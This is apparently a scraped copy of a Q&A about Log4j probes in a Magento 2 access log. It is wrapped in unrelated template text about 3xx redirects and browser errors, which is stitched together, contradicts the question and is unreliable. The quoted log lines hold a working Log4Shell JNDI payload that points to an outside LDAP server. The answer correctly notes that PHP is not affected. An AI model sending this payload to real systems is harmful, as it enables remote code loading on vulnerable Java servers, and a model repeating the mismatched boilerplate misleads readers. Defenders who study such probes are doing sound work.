Multiple Log4 vulnerability in my access log

Multiple Log4 vulnerability in my access log - If a page has internal and external outgoing links to redirecting URLs, it’s returning 3xx (301, 302, etc.) HTTP status codes standing for redirection. This issue means that the page does not exist on a permanent or temporary basis. It appears on most of the popular web browsers, usually caused by a misconfigured website. However, there are some steps you can take to ensure the issue isn’t on your side. You can find more details about redirecting URLs by reading the Google Search Central overview. In this article, we’ll go over how you can fix the Multiple Log4 vulnerability in my access log error on your web browser. Problem :

This question was migrated from Stack Overflow because it can be answered on Webmasters Stack Exchange.
Migrated last month.

My application in magento2. I checked my access log. Multiple entries are as follows in the access log.
I am not sure whether log4j was injected on my code or not because every request is 302. Please look into the following example of my access log.

"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D HTTP/1.1" 302 275 "$jndi:ldap://167.99.115.242:1389/Binary" "$jndi:ldap://167.99.115.242:1389/Binary

Solution :

Magento 2 is a PHP framework. Log4j is a (vulnerable) Java dependency. As PHP does not include any Java dependencies, you are not exploited by this try of an attack.

We hope that this article has helped you resolve the redirects, , error in your web browsers. Enjoy browsing the internet uninterrupted!